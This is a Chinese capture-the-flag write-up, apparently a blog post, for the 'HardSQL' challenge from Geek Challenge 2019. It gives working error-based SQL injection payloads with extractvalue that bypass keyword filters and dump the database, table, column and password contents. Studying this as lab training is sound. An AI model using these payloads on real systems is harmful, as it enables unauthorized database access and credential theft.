[极客大挑战 2019]HardSQL

1.报错注入

sql注入首先先试一下万能密码。
在这里插入图片描述
再试试双写
在这里插入图片描述
大小写
在这里插入图片描述
都不行都被搬了。但是我们发现单独输入一个’会出现报错界面。
在这里插入图片描述
尝试使用extractvalue进行报错注入,因为这里=被搬了我们使用like来代替=。
payload:

/check.php?username=admin&password=admin'^extractvalue(1,concat(1,(select(database()))))%23

在这里插入图片描述
成功出了库名,那么接下来就是经典组合拳了。
爆表名,payload:

/check.php?username=admin&password=admin'^extractvalue(1,concat(1,(select(group_concat(table_name))from(information_schema.tables)where(table_schema)like('geek'))))%23

在这里插入图片描述
爆列名,payload:

/check.php?username=admin&password=admin'^extractvalue(1,concat(1,(select(group_concat(column_name))from(information_schema.columns)where(table_name)like('H4rDsq1'))))%23

在这里插入图片描述
猜测password是我们要的flag信息。查询password,payload:

/check.php?username=admin&password=admin'^extractvalue(1,concat(0x7e,(select(password)from(geek.H4rDsq1))))%23

在这里插入图片描述
回显有限制,只出来了一半,我们可以用left,right来左右分别查看然后拼接。payload:

/check.php?username=admin&password=admin'^extractvalue(1,concat(0x7e,(select(left(password,30))from(geek.H4rDsq1))))%23
/check.php?username=admin&password=admin'^extractvalue(1,concat(0x7e,(select(right(password,30))from(geek.H4rDsq1))))%23

在这里插入图片描述
在这里插入图片描述
左右拼起来就是flag。

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值